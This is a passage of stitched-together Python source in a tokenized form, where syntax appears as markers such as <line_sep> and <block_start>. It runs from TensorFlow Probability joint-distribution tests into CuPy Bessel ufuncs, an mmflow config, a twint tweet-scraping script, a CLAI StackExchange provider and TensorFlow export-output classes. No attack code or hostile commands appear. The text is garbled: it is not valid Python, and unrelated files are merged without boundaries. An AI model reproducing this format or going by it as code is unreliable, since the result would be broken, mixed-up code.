<yield>tfd.Normal(a[tf.newaxis <ellipsis>]<times>b[<ellipsis> tf.newaxis] 1. name='c')<block_end>x=self.evaluate(dist.sample(4 seed=test_util.test_seed()))<line_sep>x2=self.evaluate(dist.sample(seed=test_util.test_seed() a=x.a))<line_sep>self.assertAllClose(x.a x2.a)<line_sep>self.assertAllEqual(x2.b.shape [4 3])<line_sep>self.assertAllEqual(x2.c.shape [4 3 2])<block_end># `value=` with some entries None: pinned entries are kept verbatim and the
# unpinned ones are sampled with the batch/sample shape implied by the pins.
@parameterized.named_parameters(dict(testcase_name='stateful' sampler_type='stateful') dict(testcase_name='stateless' sampler_type='stateless'))<def_stmt>test_sample_with_partially_specified_value self sampler_type<block_start>num_features=5<def_stmt>dist <block_start>scale_variance=<yield>tfd.InverseGamma(0.5 0.5)<line_sep>scale_noncentered=<yield>tfd.Sample(tfd.HalfNormal(1.) num_features)<line_sep>scale=scale_noncentered<times>scale_variance[<ellipsis> <none>]<power>0.5<line_sep>weights_noncentered=<yield>tfd.Sample(tfd.Normal(0. 1.) num_features)<line_sep><yield>tfd.Deterministic(weights_noncentered<times>scale)<block_end>joint=tfd.JointDistributionCoroutineAutoBatched(dist validate_args=<true>)<line_sep>value_partial_batch_dim=4<line_sep>value_=(3. <none> <none> np.ones([value_partial_batch_dim num_features]))<line_sep>value=[<none><if>v<is><none><else>tf.cast(v tf.float32)<for>v value_]<line_sep># The sample should keep the specified values.
xs=self.evaluate(joint.sample(value=value seed=test_util.test_seed(sampler_type=sampler_type)))<line_sep>self.assertAllEqual(xs[0] tf.fill([value_partial_batch_dim] value[0]))<line_sep>self.assertAllEqual(xs[1].shape [value_partial_batch_dim num_features])<line_sep>self.assertAllEqual(xs[2].shape [value_partial_batch_dim num_features])<line_sep>self.assertAllEqual(xs[3] value[3])<line_sep># With sample shape.
sample_shape=[6 2]<line_sep>samples=joint.sample(sample_shape value=value seed=test_util.test_seed(sampler_type=sampler_type))<line_sep>xs=self.evaluate(samples)<line_sep>expect_shp=sample_shape+[value_partial_batch_dim num_features]<line_sep>self.assertAllEqual(xs[0] tf.fill(sample_shape+[value_partial_batch_dim] value[0]))<line_sep>self.assertAllEqual(xs[1].shape expect_shp)<line_sep>self.assertAllEqual(xs[2].shape expect_shp)<line_sep>self.assertAllEqual(xs[3] value[3]<times>tf.ones(expect_shp))<line_sep>sample_shape_dynamic=tf1.placeholder_with_default(sample_shape shape=<none>)<line_sep>samples=joint.sample(sample_shape_dynamic value=value seed=test_util.test_seed(sampler_type=sampler_type))<line_sep>xs=self.evaluate(samples)<line_sep>self.assertAllEqual(xs[0] tf.fill(sample_shape+[value_partial_batch_dim] value[0]))<line_sep>self.assertAllEqual(xs[1].shape expect_shp)<line_sep>self.assertAllEqual(xs[2].shape expect_shp)<line_sep>self.assertAllEqual(xs[3] value[3]<times>tf.ones(expect_shp))<block_end># `value=` may be a (named)tuple covering only a prefix of the variables;
# later variables are sampled, picking up the pinned batch dimension.
@parameterized.named_parameters(dict(testcase_name='stateful' sampler_type='stateful') dict(testcase_name='stateless' sampler_type='stateless'))<def_stmt>test_sample_with_prefix_of_values self sampler_type<block_start>num_rows=4<line_sep>num_columns=5<def_stmt>dist <block_start>a=<yield>tfd.Sample(tfd.Normal(0. 1.) num_rows name='a')<line_sep>b=<yield>tfd.Sample(tfd.Normal(0. 1.) num_columns name='b')<line_sep><yield>tfd.Normal(a[<ellipsis> <none>]<times>b[<none> <ellipsis>] 1. 
name='c')<block_end>tuple_joint=tfd.JointDistributionCoroutineAutoBatched(dist validate_args=<true>)<line_sep>namedtuple_joint=tfd.JointDistributionCoroutineAutoBatched(dist sample_dtype=collections.namedtuple('ModelSpec' ['a' 'b' 'c'])(a=tf.float32 b=tf.float32 c=tf.float32) validate_args=<true>)<line_sep>value_partial_batch_dim=3<line_sep>v0=3.<times>np.ones([value_partial_batch_dim num_rows]).astype(np.float32)<line_sep># Tuple (or namedtuple) value contains only the first variable.
tuple_value=(v0 )<line_sep>namedtuple_value=collections.namedtuple('ValueSpec' ['a'])(a=v0)<for_stmt>joint (tuple_joint namedtuple_joint)<block_start><for_stmt>value (tuple_value namedtuple_value)<block_start>xs=self.evaluate(joint.sample(value=value seed=test_util.test_seed(sampler_type=sampler_type)))<line_sep>self.assertAllEqual(xs[0] v0)<line_sep>self.assertAllEqual(xs[1].shape [value_partial_batch_dim num_columns])<line_sep>self.assertAllEqual(xs[2].shape [value_partial_batch_dim num_rows num_columns])<block_end><block_end><block_end># Unit sample shapes ((1,), (1, 1), ...) are handled by reshaping, not by
# vmapping the model body: inside the model all draws stay scalar-shaped.
<def_stmt>test_unit_sample_shape_avoids_vectorization self<block_start>xs=[]# Collect (possibly symbolic) Tensors sampled inside the model.
@tfd.JointDistributionCoroutineAutoBatched<def_stmt>dist <block_start>x=<yield>tfd.Normal(0. 1. name='x')<line_sep>xs.append(x)<block_end># Try sampling with a variety of unit sample shapes.
self.assertEqual([1] dist.sample(1 seed=test_util.test_seed(sampler_type='seedless')).x.shape)<line_sep>self.assertEqual([1] dist.sample([1] seed=test_util.test_seed(sampler_type='seedless')).x.shape)<line_sep>self.assertEqual([1 1] dist.sample([1 1] seed=test_util.test_seed(sampler_type='seedless')).x.shape)<line_sep># Check that the model only ever saw the trivial sample shape.
<for_stmt>x xs<block_start>self.assertEqual(x.shape [])<block_end><block_end># log_prob shape for unit and non-unit sample shapes matches the reshaped
# sample shape.
<def_stmt>test_unit_sample_shape self<block_start>@tfd.JointDistributionCoroutineAutoBatched<def_stmt>dist <block_start>x=<yield>tfd.Normal(loc=tf.zeros([3]) scale=1. 
name='x')<line_sep><yield>tfd.Bernoulli(logits=tf.einsum('n->' x) name='y')<block_end><for_stmt>sample_shape [() 1 [1] [1 1] [2]]<block_start>self.assertAllEqual(dist.log_prob(dist.sample(sample_shape seed=test_util.test_seed())).shape np.reshape(sample_shape [-1]))<block_end><block_end># A namedtuple `sample_dtype` structures samples and sample_distributions
# output; log_prob still reduces over the joint event.
<def_stmt>test_sample_dtype_structures_output self<block_start>num_features=4<def_stmt>dist <block_start>scale_variance=<yield>Root(tfd.InverseGamma(0.5 0.5))<line_sep>scale_noncentered=<yield>Root(tfd.Sample(tfd.HalfNormal(1.) num_features))<line_sep>scale=scale_noncentered<times>scale_variance[<ellipsis> <none>]<power>0.5<line_sep>weights_noncentered=<yield>Root(tfd.Sample(tfd.Normal(0. 1.) num_features))<line_sep><yield>tfd.Deterministic(weights_noncentered<times>scale)<block_end># Currently sample_dtype is only used for `tf.nest.pack_structure_as`. In
# the future we may use it for error checking and/or casting.
sample_dtype=collections.namedtuple('Model' ['scale_variance' 'scale_noncentered' 'weights_noncentered' 'weights' ])(*([<none>]<times>4))<line_sep>joint=tfd.JointDistributionCoroutineAutoBatched(dist sample_dtype=sample_dtype validate_args=<true>)<line_sep>self.assertAllEqual(sorted(sample_dtype._fields) sorted(joint.sample(seed=test_util.test_seed())._fields))<line_sep>ds,xs=joint.sample_distributions(seed=test_util.test_seed())<line_sep>tf.nest.assert_same_structure(sample_dtype ds)<line_sep>tf.nest.assert_same_structure(sample_dtype xs)<line_sep>self.assertEqual([3 4] joint.log_prob(joint.sample([3 4] seed=test_util.test_seed())).shape)<block_end># repr() reflects the custom sample_dtype field names in event_shape/dtype.
<def_stmt>test_repr_with_custom_sample_dtype self<block_start>sd=collections.namedtuple('Model' ['s' 'w'])(<none> <none>)<def_stmt>dist <block_start>s=<yield>tfd.Sample(tfd.InverseGamma(2 2) 100)<line_sep><yield>tfd.Normal(0 s)<block_end>m=tfd.JointDistributionCoroutineAutoBatched(dist sample_dtype=sd)<line_sep>self.assertEqual(('<tfp.distributions.JointDistributionCoroutineAutoBatched'<concat>' 
\'JointDistributionCoroutineAutoBatched\''<concat>' batch_shape=[]'<concat>' event_shape=Model(s=[100], w=[100])'<concat>' dtype=Model(s=float32, w=float32)>') repr(m))<block_end># End-to-end LDA model: sampling, log_prob, trainable-variable tracking and
# gradient flow through tfp.util.TransformedVariable / tf.Variable params.
@parameterized.named_parameters({'testcase_name':'coroutine' 'jd_class':tfd.JointDistributionCoroutineAutoBatched} {'testcase_name':'sequential' 'jd_class':tfd.JointDistributionSequentialAutoBatched} {'testcase_name':'named' 'jd_class':tfd.JointDistributionNamedAutoBatched})@test_util.jax_disable_variable_test<def_stmt>test_latent_dirichlet_allocation self jd_class# pylint: disable=g-doc-args
<block_start>"""Tests Latent Dirichlet Allocation joint model. The LDA generative process can be written as: ```none N[i] ~ Poisson(xi) theta[i] ~ Dirichlet(alpha) Z[i] ~ Multinomial(N[i], theta[i]) for k in 1...K: X[i,k] ~ Multinomial(Z[i, k], beta[j]) ``` Typically `xi` is specified and `alpha`, `beta` are fit using type-II maximum likelihood estimators. Reference: http://www.jmlr.org/papers/volume3/blei03a/blei03a.pdf """<line_sep>seed=test_util.test_seed_stream()<line_sep># Hyperparameters.
num_topics=3<line_sep>num_words=10<line_sep>avg_doc_length=5<line_sep>u=tfd.Uniform(low=-1. high=1.)<line_sep>alpha=tfp.util.TransformedVariable(u.sample([num_topics] seed=seed()) tfb.Softplus() name='alpha')<line_sep>beta=tf.Variable(u.sample([num_topics num_words] seed=seed()) name='beta')<line_sep># Note near 1:1 with mathematical specification. The main distinction is the
# use of Independent--this lets us easily aggregate multinomials across
# topics (and in any "shape" of documents).
<def_stmt>lda_coroutine_model <block_start>n=<yield>Root(tfd.Poisson(rate=avg_doc_length))<line_sep>theta=<yield>Root(tfd.Dirichlet(concentration=alpha))<line_sep>z=<yield>tfd.Multinomial(total_count=n probs=theta)<line_sep><yield>tfd.Multinomial(total_count=z logits=beta)<block_end><if_stmt>jd_class<is>tfd.JointDistributionCoroutineAutoBatched<block_start>model=lda_coroutine_model<block_end><elif_stmt>jd_class<is>tfd.JointDistributionSequentialAutoBatched<block_start>model=[tfd.Poisson(rate=avg_doc_length) # n
tfd.Dirichlet(concentration=alpha) # theta
<lambda>theta n:tfd.Multinomial(total_count=n probs=theta) # z
<lambda>z:tfd.Multinomial(total_count=z logits=beta)]<block_end><elif_stmt>jd_class<is>tfd.JointDistributionNamedAutoBatched<block_start>model=collections.OrderedDict((('n' tfd.Poisson(rate=avg_doc_length)) ('theta' tfd.Dirichlet(concentration=alpha)) ('z' <lambda>theta n:tfd.Multinomial(total_count=n probs=theta)) ('X' <lambda>z:tfd.Multinomial(total_count=z logits=beta))))<block_end># TODO(b/159842104): Enable autovectorization for Multinomial sampling.
lda=jd_class(model validate_args=<true> use_vectorized_map=<false>)<line_sep># Now, let's sample some "documents" and compute the log-prob of each.
docs_shape=[2 4]# That is, 8 docs in the shape of [2, 4].
sample=lda.sample(docs_shape seed=seed())<line_sep>log_probs=lda.log_prob(sample)<line_sep>self.assertEqual(docs_shape log_probs.shape)<line_sep># Verify we correctly track trainable variables.
self.assertLen(lda.trainable_variables 2)<line_sep>self.assertIs(alpha.pretransformed_input lda.trainable_variables[0])<line_sep>self.assertIs(beta lda.trainable_variables[1])<line_sep># Ensure we can compute gradients.
<with_stmt>tf.GradientTape()<as>tape# Note: The samples are not taped, hence implicitly "stop_gradient."
<block_start>negloglik=-lda.log_prob(sample)<block_end>grads=tape.gradient(negloglik lda.trainable_variables)<line_sep>self.assertLen(grads 2)<line_sep>self.assertAllEqual((alpha.pretransformed_input.shape beta.shape) (grads[0].shape grads[1].shape))<line_sep>self.assertAllNotNone(grads)<block_end># The default event-space bijector round-trips samples and has matching
# forward/inverse log-det-Jacobians, with and without batch dimensions.
@parameterized.named_parameters({'testcase_name':'coroutine' 'jd_class':tfd.JointDistributionCoroutineAutoBatched} {'testcase_name':'sequential' 'jd_class':tfd.JointDistributionSequentialAutoBatched} {'testcase_name':'named' 'jd_class':tfd.JointDistributionNamedAutoBatched})<def_stmt>test_default_event_space_bijector self jd_class<block_start>models={}<def_stmt>coroutine_model <block_start>high=<yield>tfd.LogNormal(0. [1.])<line_sep><yield>tfd.Uniform(low=[[-1. -2.]] high=high[<ellipsis> tf.newaxis])<line_sep><yield>tfd.Deterministic([[0. 1. 2.]])<block_end>models[tfd.JointDistributionCoroutineAutoBatched]=coroutine_model<line_sep>models[tfd.JointDistributionSequentialAutoBatched]=[tfd.LogNormal(0. [1.]) <lambda>high:tfd.Uniform(low=[[-1. -2.]] high=high[<ellipsis> tf.newaxis]) tfd.Deterministic([[0. 1. 2.]])]<line_sep>models[tfd.JointDistributionNamedAutoBatched]=collections.OrderedDict((('high' tfd.LogNormal(0. [1.])) ('x' <lambda>high:tfd.Uniform(low=[[-1. -2.]] # pylint: disable=g-long-lambda
high=high[<ellipsis> tf.newaxis])) ('y' tfd.Deterministic([[0. 1. 
2.]]))))<line_sep>joint=jd_class(models[jd_class] batch_ndims=1 validate_args=<true>)<line_sep>self.assertAllEqual(joint.batch_shape [1])<line_sep>self.assertAllEqualNested(tf.nest.flatten(joint.event_shape) [[] [2] [3]])<line_sep>joint_bijector=joint.experimental_default_event_space_bijector()<line_sep>y=self.evaluate(joint.sample([2 3] seed=test_util.test_seed()))<line_sep>x=joint_bijector.inverse(y)<line_sep>self.assertAllCloseNested(y joint_bijector.forward(x))<line_sep>fldj=joint_bijector.forward_log_det_jacobian(x event_ndims=tf.nest.pack_sequence_as(joint.dtype [0 1 2]))<line_sep>ildj=joint_bijector.inverse_log_det_jacobian(y event_ndims=tf.nest.pack_sequence_as(joint.dtype [0 1 1]))<line_sep>self.assertAllEqual(fldj.shape joint.log_prob(y).shape)<line_sep>self.assertAllClose(fldj -ildj)<line_sep># Passing inputs *without* batch shape should return sane outputs.
y=self.evaluate(joint.sample([] seed=test_util.test_seed()))<line_sep># Strip the sample to represent just a single event.
unbatched_y=tf.nest.map_structure(<lambda>t:t[0 <ellipsis>] y)<line_sep>self.assertAllEqualNested(tf.nest.map_structure(tf.shape unbatched_y) joint.event_shape_tensor())<line_sep>ildj=joint_bijector.inverse_log_det_jacobian(unbatched_y event_ndims=tf.nest.pack_sequence_as(joint.dtype [0 1 1]))<line_sep>self.assertAllEqual(ildj.shape joint.log_prob(unbatched_y).shape)<block_end># Same bijector round-trip checks when the log-det-Jacobian is constant and
# no explicit event_ndims is passed.
@parameterized.named_parameters({'testcase_name':'coroutine' 'jd_class':tfd.JointDistributionCoroutineAutoBatched} {'testcase_name':'sequential' 'jd_class':tfd.JointDistributionSequentialAutoBatched} {'testcase_name':'named' 'jd_class':tfd.JointDistributionNamedAutoBatched})<def_stmt>test_default_event_space_bijector_constant_jacobian self jd_class<block_start>models={}<def_stmt>coroutine_model <block_start><yield>tfd.Normal(0. [1. 2.] name='x')<block_end>models[tfd.JointDistributionCoroutineAutoBatched]=coroutine_model<line_sep>models[tfd.JointDistributionSequentialAutoBatched]=[tfd.Normal(0. [1. 2.] 
name='x')]<line_sep>models[tfd.JointDistributionNamedAutoBatched]={'x':tfd.Normal(0. [1. 2.] name='x')}<line_sep>joint=jd_class(models[jd_class] batch_ndims=1 validate_args=<true>)<line_sep>self.assertAllEqual(joint.batch_shape [2])<line_sep>joint_bijector=joint.experimental_default_event_space_bijector()<line_sep>y=self.evaluate(joint.sample([3] seed=test_util.test_seed()))<line_sep>x=joint_bijector.inverse(y)<line_sep>self.assertAllCloseNested(y joint_bijector.forward(x))<line_sep>fldj=joint_bijector.forward_log_det_jacobian(x)<line_sep>ildj=joint_bijector.inverse_log_det_jacobian(y)<line_sep>self.assertAllEqual(fldj.shape joint.log_prob(y).shape)<line_sep>self.assertAllClose(fldj -ildj)<block_end># An AutoBatched JD nested inside another AutoBatched JD: shapes, log_prob,
# and `value=` round-trip all behave as for a flat model.
<def_stmt>test_nested_joint_distributions self<block_start>batch_shape=[2 3]<def_stmt>inner_fn <block_start>xy=<yield>tfd.JointDistributionNamedAutoBatched({'x':tfd.Normal(loc=tf.zeros(batch_shape) scale=tf.ones(batch_shape) name='x') 'y':<lambda>x:tfd.Poisson(log_rate=x name='y')} batch_ndims=2 name='xy')<line_sep>_=<yield>tfd.Normal(loc=0. scale=xy['y'] name='z')<block_end>joint=tfd.JointDistributionSequentialAutoBatched([tfd.JointDistributionCoroutineAutoBatched(inner_fn batch_ndims=1 name='a')])<line_sep>z=joint.sample(seed=test_util.test_seed())<line_sep># Batch and event shape.
self.assertAllEqual(joint.batch_shape [])<line_sep>self.assertAllEqualNested(tf.nest.map_structure(<lambda>x:tf.TensorShape(x.shape) z) joint.event_shape)<line_sep># Sample shape.
z2=self.evaluate(joint.sample(5 seed=test_util.test_seed()))<line_sep>lp2=joint.log_prob(z2)<line_sep>self.assertAllEqual(lp2.shape [5])<line_sep>z3=joint.sample(value=z2 seed=test_util.test_seed())<line_sep>self.assertAllCloseNested(z2 z3)<block_end># experimental_use_kahan_sum: float32 log_prob over a 20k-term Poisson plate
# stays within atol=0.01 of the float64 reference, with and without XLA jit.
@parameterized.named_parameters(*[dict(testcase_name='_{}{}'.format(jd_class.__name__ # pylint: disable=g-complex-comprehension
'_jit'<if>jit<else>'') jd_class=jd_class jit=jit)<for>jd_class (tfd.JointDistributionCoroutineAutoBatched tfd.JointDistributionSequentialAutoBatched tfd.JointDistributionNamedAutoBatched)<for>jit (<false> <true>)])<def_stmt>test_kahan_precision self jd_class jit<block_start>maybe_jit=<lambda>f:f
<if_stmt>jit<block_start>self.skip_if_no_xla()<if_stmt><not>JAX_MODE<and><not>tf.test.is_gpu_available()<block_start>self.skipTest('b/179303849')<block_end>maybe_jit=tf.function(jit_compile=<true>)<block_end><def_stmt>make_models dtype<block_start>models={}<def_stmt>mk_20k_poisson log_rate<block_start><return>tfd.Poisson(log_rate=tf.broadcast_to(log_rate[<ellipsis> tf.newaxis] log_rate.shape+(20_000 )))<block_end><def_stmt>coroutine_model <block_start>log_rate=<yield>tfd.Normal(0. dtype(.2) name='log_rate')<line_sep><yield>mk_20k_poisson(log_rate).copy(name='x')<block_end>models[tfd.JointDistributionCoroutineAutoBatched]=coroutine_model<line_sep>models[tfd.JointDistributionSequentialAutoBatched]=[tfd.Normal(0. dtype(.2)) mk_20k_poisson]<line_sep>models[tfd.JointDistributionNamedAutoBatched]=collections.OrderedDict((('log_rate' tfd.Normal(0. 
dtype(.2))) ('x' mk_20k_poisson)))<line_sep><return>models<block_end>joint=jd_class(make_models(np.float32)[jd_class] validate_args=<true> experimental_use_kahan_sum=<true>)<line_sep>joint64=jd_class(make_models(np.float64)[jd_class] validate_args=<true>)<line_sep>stream=test_util.test_seed_stream()<line_sep>nsamp=7<line_sep>xs=self.evaluate(joint.sample(log_rate=tf.zeros([nsamp]) seed=stream()))<if_stmt>isinstance(xs dict)<block_start>xs['log_rate']=tfd.Normal(0 .2).sample(nsamp seed=stream())<block_end><else_stmt><block_start>xs=(tfd.Normal(0 .2).sample(nsamp seed=stream()) xs[1])<block_end>xs64=tf.nest.map_structure(<lambda>x:tf.cast(x tf.float64) xs)<line_sep>lp=maybe_jit(joint.copy(validate_args=<not>jit).log_prob)(xs)<line_sep>lp64=joint64.log_prob(xs64)<line_sep>lp,lp64=self.evaluate((tf.cast(lp tf.float64) lp64))<line_sep># Without Kahan, example max-abs-diff: ~0.06
self.assertAllClose(lp64 lp rtol=0. atol=.01)<block_end># With Kahan summation enabled, inconsistent component batch shapes under
# batch_ndims=1 must raise ValueError from log_prob.
<def_stmt>test_kahan_broadcasting_check self<block_start><def_stmt>model <block_start>_=<yield>tfd.Normal(0. 1.)# Batch shape ()
_=<yield>tfd.Normal([0. 1. 2.] 1.)# Batch shape [3]
<block_end>dist=tfd.JointDistributionCoroutineAutoBatched(model validate_args=<true> experimental_use_kahan_sum=<true> batch_ndims=1)<line_sep>sample=self.evaluate(dist.sample(seed=test_util.test_seed(sampler_type='stateless')))<with_stmt>self.assertRaises(ValueError)<block_start>self.evaluate(dist.log_prob(sample))<block_end><block_end><block_end><if_stmt>__name__<eq>'__main__'# TODO(b/173158845): XLA:CPU reassociates away the Kahan correction term.
<block_start>os.environ['XLA_FLAGS']='--xla_cpu_enable_fast_math=false'<line_sep>test_util.main()<block_end>
<import_from_stmt>cupy _core<line_sep>j0=_core.create_ufunc('cupyx_scipy_special_j0' ('f->f' 'd->d') 'out0 = j0(in0)' doc='''Bessel function of the first kind of order 0. .. seealso:: :meth:`scipy.special.j0` ''')<line_sep>j1=_core.create_ufunc('cupyx_scipy_special_j1' ('f->f' 'd->d') 'out0 = j1(in0)' doc='''Bessel function of the first kind of order 1. .. seealso:: :meth:`scipy.special.j1` ''')<line_sep>y0=_core.create_ufunc('cupyx_scipy_special_y0' ('f->f' 'd->d') 'out0 = y0(in0)' doc='''Bessel function of the second kind of order 0. .. seealso:: :meth:`scipy.special.y0` ''')<line_sep>y1=_core.create_ufunc('cupyx_scipy_special_y1' ('f->f' 'd->d') 'out0 = y1(in0)' doc='''Bessel function of the second kind of order 1. .. seealso:: :meth:`scipy.special.y1` ''')<line_sep>i0=_core.create_ufunc('cupyx_scipy_special_i0' ('f->f' 'd->d') 'out0 = cyl_bessel_i0(in0)' doc='''Modified Bessel function of order 0. .. seealso:: :meth:`scipy.special.i0` ''')<line_sep>i1=_core.create_ufunc('cupyx_scipy_special_i1' ('f->f' 'd->d') 'out0 = cyl_bessel_i1(in0)' doc='''Modified Bessel function of order 1. .. seealso:: :meth:`scipy.special.i1` ''')<line_sep>
_base_=['../_base_/models/irrpwc.py' '../_base_/datasets/flyingthings3d_subset_bi_with_occ_384x768.py' '../_base_/schedules/schedule_s_fine_half.py' '../_base_/default_runtime.py']<line_sep>custom_hooks=[dict(type='EMAHook')]<line_sep>data=dict(train_dataloader=dict(samples_per_gpu=1 workers_per_gpu=5 drop_last=<true>) val_dataloader=dict(samples_per_gpu=1 workers_per_gpu=5 shuffle=<false>) test_dataloader=dict(samples_per_gpu=1 workers_per_gpu=5 shuffle=<false>))<line_sep># Train on FlyingChairsOcc and finetune on FlyingThings3D_subset load_from='https://download.openmmlab.com/mmflow/irr/irrpwc_8x1_sshort_flyingchairsocc_384x448.pth'# noqa
<import_stmt>sys<import_stmt>base_func<as>base<import_stmt>twint<import_from_stmt>similar_hashtags similar_hashtags<import_from_stmt>top_mentions_hashtags top_mentions_hashtags<as>mentions<def_stmt>basic username search<block_start>base.get_user_bio(username search)<line_sep>base.get_user_tweets(username search <true>)<block_end><def_stmt>get_keyword key limit=100<block_start>base.get_tweets(key limit)<block_end><def_stmt>top_mention <block_start>key_val=int(input('no of users'))<line_sep>seed_user=list(map(str input('Enter usernames').strip().split()))[:key_val]<line_sep>limit=int(input('No of tweets to be pulled'))# default limit = 500 <for_stmt>username seed_user<block_start>mentions.get_top_mentions_hashtags(username)<block_end><block_end><def_stmt>similar_hashtag <block_start>key_val=int(input('no of hastags'))<line_sep>seed_hash=list(map(str input('Enter hashtags').strip().split()))[:key_val]<line_sep>limit=int(input('No of tweets to be pulled'))# default limit = 500 <for_stmt>seed_hashtag seed_hash<block_start>similar_hashtags.get_similar_hashtags(seed_hashtag limit)<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>username=sys.argv[1]<line_sep>string=sys.argv[2]<line_sep>basic(username string)<block_end>
module_name="Search"<line_sep>priority=17<line_sep>
# # Copyright (C) 2020 IBM. All Rights Reserved. # # See LICENSE.txt file in the root directory # of this source tree for licensing information. # <import_stmt>json<import_from_stmt>typing List Dict<import_from_stmt>clai.server.searchlib.providers Provider<class_stmt>StackExchange(Provider)<block_start><def_stmt>__init__ self name:str description:str section:dict<block_start>super().__init__(name description section)<line_sep>self.__log_debug__("UNIX StackExchange provider initialized")<block_end><def_stmt>call self query:str limit:int=1 **kwargs<block_start>self.__log_debug__(f"call(query={query}, limit={str(limit)}), **kwargs={str(kwargs)})")<line_sep>payload={"text":query "limit":limit}<line_sep>request=self.__send_post_request__(self.base_uri data=json.dumps(payload))<if_stmt>request.status_code<eq>200<block_start><return>request.json()["hits"]<block_end><return><none><block_end><def_stmt>extract_search_result self data:List[Dict]<arrow>str<block_start><return>data[0]["Answer"]<block_end><def_stmt>get_printable_output self data:List[Dict]<arrow>str<block_start>lines=[f"Post: {data[0]['Content'][:384]+' ...'}" f"Answer: {data[0]['Answer'][:256]+' ...'}" f"Link: {data[0]['Url']}\n" ]<line_sep><return>"\n".join(lines)<block_end><block_end>
# Copyright 2017 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Classes for different types of export output."""<import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<import_stmt>abc<import_stmt>six<import_from_stmt>tensorflow.python.framework dtypes<import_from_stmt>tensorflow.python.framework ops<import_from_stmt>tensorflow.python.saved_model signature_def_utils<class_stmt>ExportOutput(object)<block_start>"""Represents an output of a model that can be served. These typically correspond to model heads. """<line_sep>__metaclass__=abc.ABCMeta<line_sep>@abc.abstractmethod<def_stmt>as_signature_def self receiver_tensors<block_start>"""Generate a SignatureDef proto for inclusion in a MetaGraphDef. The SignatureDef will specify outputs as described in this ExportOutput, and will use the provided receiver_tensors as inputs. Args: receiver_tensors: a `Tensor`, or a dict of string to `Tensor`, specifying input nodes that will be fed. """<line_sep><pass><block_end><block_end><class_stmt>ClassificationOutput(ExportOutput)<block_start>"""Represents the output of a classification head. Either classes or scores or both must be set. The classes `Tensor` must provide string labels, not integer class IDs. If only classes is set, it is interpreted as providing top-k results in descending order. 
If only scores is set, it is interpreted as providing a score for every class in order of class ID. If both classes and scores are set, they are interpreted as zipped, so each score corresponds to the class at the same index. Clients should not depend on the order of the entries. """<def_stmt>__init__ self scores=<none> classes=<none><block_start>"""Constructor for `ClassificationOutput`. Args: scores: A float `Tensor` giving scores (sometimes but not always interpretable as probabilities) for each class. May be `None`, but only if `classes` is set. Interpretation varies-- see class doc. classes: A string `Tensor` giving predicted class labels. May be `None`, but only if `scores` is set. Interpretation varies-- see class doc. Raises: ValueError: if neither classes nor scores is set, or one of them is not a `Tensor` with the correct dtype. """<if_stmt>(scores<is><not><none><and><not>(isinstance(scores ops.Tensor)<and>scores.dtype.is_floating))<block_start><raise>ValueError('Classification scores must be a float32 Tensor; '<concat>'got {}'.format(scores))<block_end><if_stmt>(classes<is><not><none><and><not>(isinstance(classes ops.Tensor)<and>dtypes.as_dtype(classes.dtype)<eq>dtypes.string))<block_start><raise>ValueError('Classification classes must be a string Tensor; '<concat>'got {}'.format(classes))<block_end><if_stmt>scores<is><none><and>classes<is><none><block_start><raise>ValueError('At least one of scores and classes must be set.')<block_end>self._scores=scores<line_sep>self._classes=classes<block_end>@property<def_stmt>scores self<block_start><return>self._scores<block_end>@property<def_stmt>classes self<block_start><return>self._classes<block_end><def_stmt>as_signature_def self receiver_tensors<block_start><if_stmt>len(receiver_tensors)<ne>1<block_start><raise>ValueError('Classification input must be a single string Tensor; '<concat>'got {}'.format(receiver_tensors))<block_end>(_ 
examples),=receiver_tensors.items()<if_stmt>dtypes.as_dtype(examples.dtype)<ne>dtypes.string<block_start><raise>ValueError('Classification input must be a single string Tensor; '<concat>'got {}'.format(receiver_tensors))<block_end><return>signature_def_utils.classification_signature_def(examples self.classes self.scores)<block_end><block_end><class_stmt>RegressionOutput(ExportOutput)<block_start>"""Represents the output of a regression head."""<def_stmt>__init__ self value<block_start>"""Constructor for `RegressionOutput`. Args: value: a float `Tensor` giving the predicted values. Required. Raises: ValueError: if the value is not a `Tensor` with dtype tf.float32. """<if_stmt><not>(isinstance(value ops.Tensor)<and>value.dtype.is_floating)<block_start><raise>ValueError('Regression output value must be a float32 Tensor; '<concat>'got {}'.format(value))<block_end>self._value=value<block_end>@property<def_stmt>value self<block_start><return>self._value<block_end><def_stmt>as_signature_def self receiver_tensors<block_start><if_stmt>len(receiver_tensors)<ne>1<block_start><raise>ValueError('Regression input must be a single string Tensor; '<concat>'got {}'.format(receiver_tensors))<block_end>(_ examples),=receiver_tensors.items()<if_stmt>dtypes.as_dtype(examples.dtype)<ne>dtypes.string<block_start><raise>ValueError('Regression input must be a single string Tensor; '<concat>'got {}'.format(receiver_tensors))<block_end><return>signature_def_utils.regression_signature_def(examples self.value)<block_end><block_end><class_stmt>PredictOutput(ExportOutput)<block_start>"""Represents the output of a generic prediction head. A generic prediction need not be either a classification or a regression. Named outputs must be provided as a dict from string to `Tensor`, """<def_stmt>__init__ self outputs<block_start>"""Constructor for PredictOutput. Args: outputs: A dict of string to `Tensor` representing the predictions. 
Raises: ValueError: if the outputs is not dict, or any of its keys are not strings, or any of its values are not `Tensor`s. """<if_stmt><not>isinstance(outputs dict)<block_start><raise>ValueError('Prediction outputs must be given as a dict of string to Tensor; '<concat>'got {}'.format(outputs))<block_end><for_stmt>key,value outputs.items()<block_start><if_stmt><not>isinstance(key six.string_types)<block_start><raise>ValueError('Prediction output key must be a string; got {}.'.format(key))<block_end><if_stmt><not>isinstance(value ops.Tensor)<block_start><raise>ValueError('Prediction output value must be a Tensor; got {}.'.format(value))<block_end><block_end>self._outputs=outputs<block_end>@property<def_stmt>outputs self<block_start><return>self._outputs<block_end><def_stmt>as_signature_def self receiver_tensors<block_start><return>signature_def_utils.predict_signature_def(receiver_tensors self.outputs)<block_end><block_end>
